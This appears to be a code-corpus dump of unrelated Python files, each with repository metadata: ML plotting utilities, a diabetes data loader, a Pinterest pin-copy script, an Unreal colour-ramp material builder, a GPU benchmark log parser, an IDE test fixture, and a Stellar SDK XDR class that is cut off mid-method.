2021-07-14T19:18:47.000Z
|
2022-03-21T17:50:46.000Z
|
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | null | null | null |
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | null | null | null |
import torch
import numpy as np
import matplotlib.pyplot as plt
from lib.utils import moving_average, check_numpy
@torch.no_grad()
def visualize_pdf(maml):
i = 0
plt.figure(figsize=[22, 34])
for name, (weight_maml_init, bias_maml_init) in maml.initializers.items():
weight_base_init, _ = maml.untrained_initializers[name]
base_mean = weight_base_init.mean.item()
base_std = weight_base_init.std.item()
maml_mean = weight_maml_init.mean.item()
maml_std = weight_maml_init.std.item()
base_init = torch.distributions.Normal(base_mean, base_std)
maml_init = torch.distributions.Normal(maml_mean, maml_std)
i += 1
plt.subplot(6, 4, i)
xx = np.linspace(min([base_mean - 3.*base_std, maml_mean - 3.*maml_std]),
max([base_mean + 3.*base_std, maml_mean + 3.*maml_std]), 1000)
if i == 12:
yy = base_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, '--', label='Fixup')
yy = maml_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, c='g', label='Fixup + DIMAML')
leg = plt.legend(loc=4, fontsize=14.5, frameon=False)
for line in leg.get_lines():
line.set_linewidth(1.6)
else:
yy = base_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, '--')
yy = maml_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, c='g')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.title(name + '_weight', fontsize=14)
plt.show()
@torch.no_grad()
def visualize_quantile_functions(maml):
plt.figure(figsize=[22, 34])
i = 0
for name, (weight_quantile_function, bias_quantile_function) in maml.initializers.items():
wq_init, bq_init = maml.untrained_initializers[name]
i += 1
plt.subplot(6, 4, i)
xx = torch.linspace(0., 1., 1000).cuda()
if i == 12:
yy = wq_init(xx)
plt.plot(check_numpy(xx), check_numpy(yy), '--', label='Fixup')
yy = weight_quantile_function(xx)
plt.plot(check_numpy(xx), check_numpy(yy), c='g', label='Fixup $\\rightarrow$ DIMAML')
leg = plt.legend(loc=4, fontsize=14, frameon=False)
for line in leg.get_lines():
line.set_linewidth(1.6)
else:
yy = wq_init(xx)
plt.plot(check_numpy(xx), check_numpy(yy), '--')
yy = weight_quantile_function(xx)
plt.plot(check_numpy(xx), check_numpy(yy), c='g')
plt.xlim([0, 1])
plt.title(name + '_weight')
plt.show()
def draw_plots(base_train_loss, base_test_loss, base_test_error,
maml_train_loss, maml_test_loss, maml_test_error):
plt.figure(figsize=(20, 6))
plt.subplot(1,3,1)
plt.plot(moving_average(base_train_loss, span=10), label='Baseline')
plt.plot(moving_average(maml_train_loss, span=10), c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Train loss", fontsize=14)
plt.subplot(1,3,2)
plt.plot(base_test_loss, label='Baseline')
plt.plot(maml_test_loss, c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Test loss", fontsize=14)
plt.subplot(1,3,3)
plt.plot(base_test_error, label='Baseline')
plt.plot(maml_test_error, c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Test classification error", fontsize=14)
| 39.322222
| 98
| 0.607234
| 0
| 0
| 0
| 0
| 2,614
| 0.738627
| 0
| 0
| 218
| 0.061599
|
65b25da916e80ac5c60ab157203cd5360dfed5f5
| 3,170
|
py
|
Python
|
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
from __future__ import division
# import urllib2
import os, sys
import numpy as np
import pandas as pd
from collections import defaultdict
from sklearn import feature_extraction
from sklearn import preprocessing
from random import seed, shuffle
# sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
# import utils as ut
SEED = 1234
seed(SEED)
np.random.seed(SEED)
def load_diabetes():
FEATURES_CLASSIFICATION = ["race", "gender", "age", "weight", "admission_type_id",
"discharge_disposition_id", "admission_source_id", "time_in_hospital", "payer_code",
"medical_specialty", "num_lab_procedures", "num_procedures", "num_medications",
"number_outpatient", "number_emergency", "number_inpatient", "diag_1", "diag_2",
"diag_3", "number_diagnoses", "max_glu_serum", "A1Cresult", "metformin", "repaglinide",
"nateglinide", "chlorpropamide", "glimepiride", "acetohexamide", "glipizide",
"glyburide", "tolbutamide", "pioglitazone", "rosiglitazone", "acarbose", "miglitol",
"troglitazone", "tolazamide", "examide", "citoglipton", "insulin", "glyburide-metformin",
"glipizide-metformin", "glimepiride-pioglitazone", "metformin-rosiglitazone",
"metformin-pioglitazone", "change", "readmitted"]
CONT_VARIABLES = ["admission_type_id",
"discharge_disposition_id", "admission_source_id", "time_in_hospital", "num_lab_procedures",
"num_procedures", "num_medications",
"number_outpatient", "number_emergency", "number_inpatient", "number_diagnoses"]
CLASS_FEATURE = "diabetesMed" # the decision variable
COMPAS_INPUT_FILE = "DataPreprocessing/diabetic_data.csv"
df = pd.read_csv(COMPAS_INPUT_FILE)
# convert to np array
data = df.to_dict('list')
for k in data.keys():
data[k] = np.array(data[k])
""" Feature normalization and one hot encoding """
# convert class label 0 to -1
y = data[CLASS_FEATURE]
y[y == 'No'] = "1"
y[y == "Yes"] = '-1'
y = np.array([int(k) for k in y])
X = np.array([]).reshape(len(y), 0) # empty array with num rows same as num examples, will hstack the features to it
cl_names = []
for attr in FEATURES_CLASSIFICATION:
vals = data[attr]
if attr in CONT_VARIABLES:
vals = [float(v) for v in vals]
vals = preprocessing.scale(vals) # 0 mean and 1 variance
vals = np.reshape(vals, (len(y), -1)) # convert from 1-d arr to a 2-d arr with one col
cl_names.append(attr)
else: # for binary categorical variables, the label binarizer uses just one var instead of two
xxx = pd.get_dummies(vals, prefix=attr, prefix_sep='?')
cl_names += [at_in for at_in in xxx.columns]
vals = xxx
# add to learnable features
X = np.hstack((X, vals))
return X, y, cl_names
| 44.647887
| 121
| 0.613565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,493
| 0.470978
|
65b262473f8b6de6d59edf029ac0e4e27f71979d
| 2,300
|
py
|
Python
|
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copying a pin is not representative of typical user behavior on Pinterest.
#
# This script is intended to demonstrate how to use the API to developers,
# and to provide functionality that might be convenient for developers.
# For example, it might be used as part of a program to generate an
# account to be used to test an API-based application.
#
import argparse
import sys
from os.path import abspath, dirname, join
sys.path.append(abspath(join(dirname(__file__), "..", "src")))
from api_config import ApiConfig
from arguments import common_arguments
def main(argv=[]):
"""
This script copies a pin to a board, both of which are specified by identifiers
that can be found using the get_user_pins.py and get_user_boards.py script.
If a section identifier is specified in addition to a board identifier,
this script will copy the pin to the board section. Section identifiers can be
found using the get_board.py script. A section identifier may not be specified
without a board identifier.
"""
parser = argparse.ArgumentParser(description="Copy a Pin")
parser.add_argument("-p", "--pin-id", required=True, help="source pin identifier")
parser.add_argument("-m", "--media", help="media path or id")
parser.add_argument(
"-b", "--board-id", required=True, help="destination board identifier"
)
parser.add_argument("-s", "--section", help="destination board section")
common_arguments(parser)
args = parser.parse_args(argv)
# get configuration from defaults and/or the environment
api_config = ApiConfig(verbosity=args.log_level, version=args.api_version)
# imports that depend on the version of the API
from access_token import AccessToken
from oauth_scope import Scope
from pin import Pin
access_token = AccessToken(api_config, name=args.access_token)
access_token.fetch(scopes=[Scope.READ_PINS, Scope.WRITE_BOARDS, Scope.WRITE_PINS])
pin = Pin(args.pin_id, api_config, access_token)
pin_data = pin.get()
print("source pin:")
Pin.print_summary(pin_data)
new_pin_data = pin.create(pin_data, args.board_id, args.section, args.media)
print("new pin:")
Pin.print_summary(new_pin_data)
if __name__ == "__main__":
main(sys.argv[1:])
| 37.096774
| 86
| 0.729565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,129
| 0.49087
|
65b30f63399f7d1910889d551fa68b83b2e4d6e6
| 10,308
|
py
|
Python
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | 31
|
2020-10-16T03:15:06.000Z
|
2022-01-31T03:06:44.000Z
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | 1
|
2020-10-16T07:02:25.000Z
|
2020-10-16T13:05:39.000Z
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | null | null | null |
import unreal
BL_ColorRamp4 = unreal.AssetToolsHelpers.get_asset_tools().create_asset('BL_ColorRamp4', '/Engine/Functions/BLUI/', unreal.MaterialFunction, unreal.MaterialFunctionFactoryNew())
BL_ColorRamp4.set_editor_property("expose_to_library", True)
BL_ColorRamp4.set_editor_property("library_categories_text", ("BLUI", "Custom", "Utility"))
create_expression = unreal.MaterialEditingLibrary.create_material_expression_in_function
create_connection = unreal.MaterialEditingLibrary.connect_material_expressions
connect_property = unreal.MaterialEditingLibrary.connect_material_property
update_function = unreal.MaterialEditingLibrary.update_material_function
mat_func_separate = unreal.load_asset('/Engine/Functions/Engine_MaterialFunctions02/Utility/BreakOutFloat3Components')
mat_func_combine = unreal.load_asset('/Engine/Functions/Engine_MaterialFunctions02/Utility/MakeFloat3')
### Creating Nodes
Mix = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,-340.0, 3620.0)
Reroute01 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 3360.0)
Math20 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-640.0, 4415.648193359375)
Math19 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-800.0, 4415.648193359375)
Math18 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-800.0, 4235.648193359375)
Math21 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-640.0, 4235.648193359375)
Mix01 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,-20.0, 4480.0)
Math22 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-480.0, 4260.0)
Reroute10 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Reroute09 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Reroute08 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Math23 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-320.0, 4320.0)
Reroute06 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 4400.0)
Reroute07 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 4400.0)
Reroute05 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1849.2108154296875, 5160.0)
Reroute02 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Reroute03 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Reroute04 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Math24 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-120.0, 5080.0)
Math25 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-280.0, 5040.0)
Math27 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-600.0, 5195.648193359375)
Math28 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-600.0, 5015.648193359375)
Math29 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-440.0, 5015.648193359375)
Math26 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-440.0, 5195.648193359375)
Mix02 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,100.0, 5180.0)
Math12 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-1080.0, 3460.0)
Math15 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-920.0, 3460.0)
Math16 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-760.0, 3480.0)
Math17 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-600.0, 3540.0)
Math14 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-900.0, 3640.0)
Math13 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionSubtract, -1080.0, 3640.0)
Position0 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3540.0)
Color0 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3620.0)
Position1 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3800.0)
Color1 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3880.0)
Position2 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1560.0, 4540.0)
Color2 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1560.0, 4620.0)
Position3 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1360.0, 5320.0)
Color3 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput,-1360.0, 5400.0)
Factor = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -2200.0, 3320.0)
OutputResult = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionOutput,400, 5280)
### Loading Material Functions and Textures
### Setting Values
Color0.input_name = 'Color0'
Color0.sort_priority = 0
Color0.preview_value = (0.0, 0.0, 0.0, 1.0)
Color0.use_preview_value_as_default = True
Position0.input_name = 'Position0'
Position0.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position0.sort_priority = 1
Position0.preview_value = (0.0, 0.0, 0.0, 1.0)
Position0.use_preview_value_as_default = True
Color1.input_name = 'Color1'
Color1.sort_priority = 2
Color1.preview_value = (1.0, 0.0, 0.0, 1.0)
Color1.use_preview_value_as_default = True
Position1.input_name = "Position1"
Position1.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position1.sort_priority = 3
Position1.preview_value = (0.125, 0, 0, 1)
Position1.use_preview_value_as_default = True
Color2.input_name = 'Color2'
Color2.sort_priority = 4
Color2.preview_value = (1.0, 0.5, 0.0, 1)
Color2.use_preview_value_as_default = True
Position2.input_name = "Position2"
Position2.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position2.sort_priority = 5
Position2.preview_value = (0.250, 0, 0, 1)
Position2.use_preview_value_as_default = True
Color3.input_name = 'Color3'
Color3.sort_priority = 6
Color3.preview_value = (1.0, 1, 0.0, 1)
Color3.use_preview_value_as_default = True
Position3.input_name = "Position3"
Position3.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position3.sort_priority = 7
Position3.preview_value = (1, 0, 0, 1)
Position3.use_preview_value_as_default = True
Factor.input_name = 'Factor'
Factor.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Factor.sort_priority = 8
Factor.preview_value = (0.0, 0.0, 0.0, 1.0)
Factor.use_preview_value_as_default = True
### Creating Connections
Color1_connection = create_connection(Color1, '', Mix, 'B')
Position1_connection = create_connection(Position1, '', Math12, 'A')
Position1_connection = create_connection(Position1, '', Math13, 'B')
Position1_connection = create_connection(Position1, '', Reroute09, '')
Position1_connection = create_connection(Position1, '', Reroute10, '')
Position1_connection = create_connection(Position1, '', Reroute08, '')
Mix_connection = create_connection(Mix, '', Mix01, 'A')
Position0_connection = create_connection(Position0, '', Math12, 'B')
Position0_connection = create_connection(Position0, '', Math14, 'A')
Position0_connection = create_connection(Position0, '', Math13, 'A')
Color0_connection = create_connection(Color0, '', Mix, 'A')
Reroute01_connection = create_connection(Reroute01, '', Reroute06, '')
Reroute01_connection = create_connection(Reroute01, '', Math16, 'B')
Reroute01_connection = create_connection(Reroute01, '', Reroute07, '')
Math20_connection = create_connection(Math20, '', Math23, 'B')
Math19_connection = create_connection(Math19, '', Math20, 'B')
Math18_connection = create_connection(Math18, '', Math21, 'B')
Math21_connection = create_connection(Math21, '', Math22, 'A')
Color2_connection = create_connection(Color2, '', Mix01, 'B')
Mix01_connection = create_connection(Mix01, '', Mix02, 'A')
Position2_connection = create_connection(Position2, '', Math18, 'A')
Position2_connection = create_connection(Position2, '', Math19, 'B')
Position2_connection = create_connection(Position2, '', Reroute03, '')
Position2_connection = create_connection(Position2, '', Reroute04, '')
Position2_connection = create_connection(Position2, '', Reroute02, '')
Math22_connection = create_connection(Math22, '', Math23, 'A')
Reroute10_connection = create_connection(Reroute10, '', Math20, 'A')
Reroute09_connection = create_connection(Reroute09, '', Math18, 'B')
Reroute08_connection = create_connection(Reroute08, '', Math19, 'A')
Math23_connection = create_connection(Math23, '', Mix01, 'Alpha')
Reroute06_connection = create_connection(Reroute06, '', Math22, 'B')
Reroute07_connection = create_connection(Reroute07, '', Reroute05, '')
Reroute05_connection = create_connection(Reroute05, '', Math25, 'B')
Reroute02_connection = create_connection(Reroute02, '', Math26, 'A')
Reroute03_connection = create_connection(Reroute03, '', Math28, 'B')
Reroute04_connection = create_connection(Reroute04, '', Math27, 'A')
Math24_connection = create_connection(Math24, '', Mix02, 'Alpha')
Math25_connection = create_connection(Math25, '', Math24, 'A')
Math27_connection = create_connection(Math27, '', Math26, 'B')
Math28_connection = create_connection(Math28, '', Math29, 'B')
Math29_connection = create_connection(Math29, '', Math25, 'A')
Color3_connection = create_connection(Color3, '', Mix02, 'B')
Math26_connection = create_connection(Math26, '', Math24, 'B')
Position3_connection = create_connection(Position3, '', Math28, 'A')
Position3_connection = create_connection(Position3, '', Math27, 'B')
Factor_connection = create_connection(Factor, '', Reroute01, '')
Math12_connection = create_connection(Math12, '', Math15, 'B')
Math15_connection = create_connection(Math15, '', Math16, 'A')
Math16_connection = create_connection(Math16, '', Math17, 'A')
Math17_connection = create_connection(Math17, '', Mix, 'Alpha')
Math14_connection = create_connection(Math14, '', Math17, 'B')
Math13_connection = create_connection(Math13, '', Math14, 'B')
Mix02_connection = create_connection(Mix02, '', OutputResult, '')
update_function()
| 60.994083
| 178
| 0.796954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 708
| 0.068685
|
65b36386e6a8fce39db4d492a4e6ead8f8c27f5c
| 6,731
|
py
|
Python
|
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import re
import glob
import argparse
import pandas as pd
list_test = ['alexnet',
'inception3',
'inception4',
'resnet152',
'resnet50',
'vgg16']
# Naming convention
# Key: log name
# Value: ([num_gpus], [names])
# num_gpus: Since each log folder has all the record for different numbers of GPUs, it is convenient to specify the benchmarks you want to pull by listing the num_gpus
# names: rename the experiments so they are easier to undertand
list_system = {
"i7-6850K-GeForce_GTX_1080_Ti": ([1], ['GTX 1080Ti']),
"i7-9750H-GeForce_RTX_2070_with_Max-Q_Design_XLA_TF1_15": ([1], ['RTX 2070 MAX-Q']),
"i7-9750H-GeForce_RTX_2080_with_Max-Q_Design_XLA_TF1_15": ([1], ['RTX 2080 MAX-Q']),
"i7-10875H-GeForce_RTX_2080_Super_with_Max-Q_Design_XLA_TF2_2": ([1], ['RTX 2080 SUPER MAX-Q']),
"Gold_6230-GeForce_RTX_2080_Ti_NVLink_XLA_trt_TF1_15": ([2, 4, 8], ['2x RTX 2080Ti NVLink', '4x RTX 2080Ti NVLink', '8x RTX 2080Ti NVLink']),
"Gold_6230-GeForce_RTX_2080_Ti_XLA_trt_TF1_15": ([1, 2, 4, 8], ['RTX 2080Ti', '2x RTX 2080Ti', '4x RTX 2080Ti', '8x RTX 2080Ti']),
"Platinum-Tesla_V100-SXM3-32GB_HP16_TF2_2": ([1, 8], ['V100 32GB', '8x V100 32GB']),
"Gold_6230-Quadro_RTX_8000_XLA_trt_TF1_15": ([1, 2, 4, 8], ['RTX 8000', '2x RTX 8000', '4x RTX 8000', '8x RTX 8000']),
"Gold_6230-Quadro_RTX_8000_NVLink_XLA_trt_TF1_15": ([2, 4, 8], ['2x RTX 8000 NVLink', '4x RTX 8000 NVLink', '8x RTX 8000 NVLink']),
"7502-A100-PCIE-40GB": ([1, 2, 4, 8], ['A100 40GB PCIe', '2x A100 40GB PCIe', '4x A100 40GB PCIe', '8x A100 40GB PCIe']),
"3960X-GeForce_RTX_3080_XLA": ([1, 2], ['RTX 3080', '2x RTX 3080']),
"3970X-GeForce_RTX_3090_XLA": ([1, 2, 3], ['RTX 3090', '2x RTX 3090', '3x RTX 3090']),
"7502-RTX_A6000_XLA_TF1_15": ([1, 2, 4, 8], ['RTX A6000', '2x RTX A6000', '4x RTX A6000', '8x RTX A6000'])
}
def get_result(path_logs, folder, model):
folder_path = glob.glob(path_logs + '/' + folder + '/' + model + '*')[0]
folder_name = folder_path.split('/')[-1]
batch_size = folder_name.split('-')[-1]
file_throughput = folder_path + '/throughput/1'
with open(file_throughput, 'r') as f:
lines = f.read().splitlines()
line = lines[-2]
throughput = line.split(' ')[-1]
try:
throughput = int(round(float(throughput)))
except:
throughput = 0
return batch_size, throughput
def create_row_throughput(path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True):
if is_train:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus'
else:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus' + '-inference'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus' + '-inference'
for model in list_test:
if precision == 'fp32':
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = throughput
df.at[name, 'num_gpu'] = num_gpu
def create_row_batch_size(path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True):
if is_train:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus'
else:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus' + '-inference'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus' + '-inference'
for model in list_test:
if precision == 'fp32':
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = int(batch_size) * num_gpu
df.at[name, 'num_gpu'] = num_gpu
def main():
parser = argparse.ArgumentParser(description='Gather benchmark results.')
parser.add_argument('--path', type=str, default='logs',
help='path that has the logs')
parser.add_argument('--mode', type=str, default='replicated',
choices=['replicated', 'parameter_server'],
help='Method for parameter update')
parser.add_argument('--data', type=str, default='syn',
choices=['syn', 'real'],
help='Choose between synthetic data and real data')
parser.add_argument('--precision', type=str, default='fp32',
choices=['fp32', 'fp16'],
help='Choose becnhmark precision')
args = parser.parse_args()
columns = []
columns.append('num_gpu')
for model in list_test:
columns.append(model)
list_row = []
for key, value in sorted(list_system.items()):
for name in value[1]:
list_row.append(name)
# Train Throughput
df_throughput = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
# list_gpus = list_system[key][0]
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_throughput(args.path, args.mode, args.data, args.precision, key, num_gpu, name, df_throughput)
df_throughput.index.name = 'name_gpu'
df_throughput.to_csv('tf-train-throughput-' + args.precision + '.csv')
# # Inference Throughput
# df_throughput = pd.DataFrame(index=list_row, columns=columns)
# for key in list_system:
# list_gpus = list_system[key]
# for num_gpu in list_gpus:
# create_row_throughput(args.path, args.mode, key, num_gpu, df_throughput, False)
# df_throughput.index.name = 'name_gpu'
# df_throughput.to_csv('tf-inference-throughput-' + precision + '.csv')
# Train Batch Size
df_bs = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_batch_size(args.path, args.mode, args.data, args.precision, key, num_gpu, name, df_bs)
df_bs.index.name = 'name_gpu'
df_bs.to_csv('tf-train-bs-' + args.precision + '.csv')
if __name__ == "__main__":
main()
| 38.028249
| 167
| 0.606002
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,545
| 0.378101
|
65b51ba1b7053c61b8b8e0893b561770fa90e439
| 22
|
py
|
Python
|
python/testData/keywordCompletion/noneInArgList.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/keywordCompletion/noneInArgList.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/keywordCompletion/noneInArgList.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo(x=Non<caret>):
| 22
| 22
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65b8b4c75d35105b5ff106a11aa54530eaf30029
| 2,687
|
py
|
Python
|
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | null | null | null |
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | 27
|
2022-01-12T10:55:38.000Z
|
2022-03-28T01:38:24.000Z
|
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | 2
|
2021-12-02T12:42:03.000Z
|
2021-12-07T20:53:10.000Z
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from ..type_checked import type_checked
from .survey_message_command_type import SurveyMessageCommandType
from .topology_response_body import TopologyResponseBody
__all__ = ["SurveyResponseBody"]
@type_checked
class SurveyResponseBody:
"""
XDR Source Code::
union SurveyResponseBody switch (SurveyMessageCommandType type)
{
case SURVEY_TOPOLOGY:
TopologyResponseBody topologyResponseBody;
};
"""
def __init__(
self,
type: SurveyMessageCommandType,
topology_response_body: TopologyResponseBody = None,
) -> None:
self.type = type
self.topology_response_body = topology_response_body
def pack(self, packer: Packer) -> None:
self.type.pack(packer)
if self.type == SurveyMessageCommandType.SURVEY_TOPOLOGY:
if self.topology_response_body is None:
raise ValueError("topology_response_body should not be None.")
self.topology_response_body.pack(packer)
return
@classmethod
def unpack(cls, unpacker: Unpacker) -> "SurveyResponseBody":
type = SurveyMessageCommandType.unpack(unpacker)
if type == SurveyMessageCommandType.SURVEY_TOPOLOGY:
topology_response_body = TopologyResponseBody.unpack(unpacker)
return cls(type=type, topology_response_body=topology_response_body)
return cls(type=type)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "SurveyResponseBody":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "SurveyResponseBody":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.type == other.type
and self.topology_response_body == other.topology_response_body
)
def __str__(self):
out = []
out.append(f"type={self.type}")
out.append(
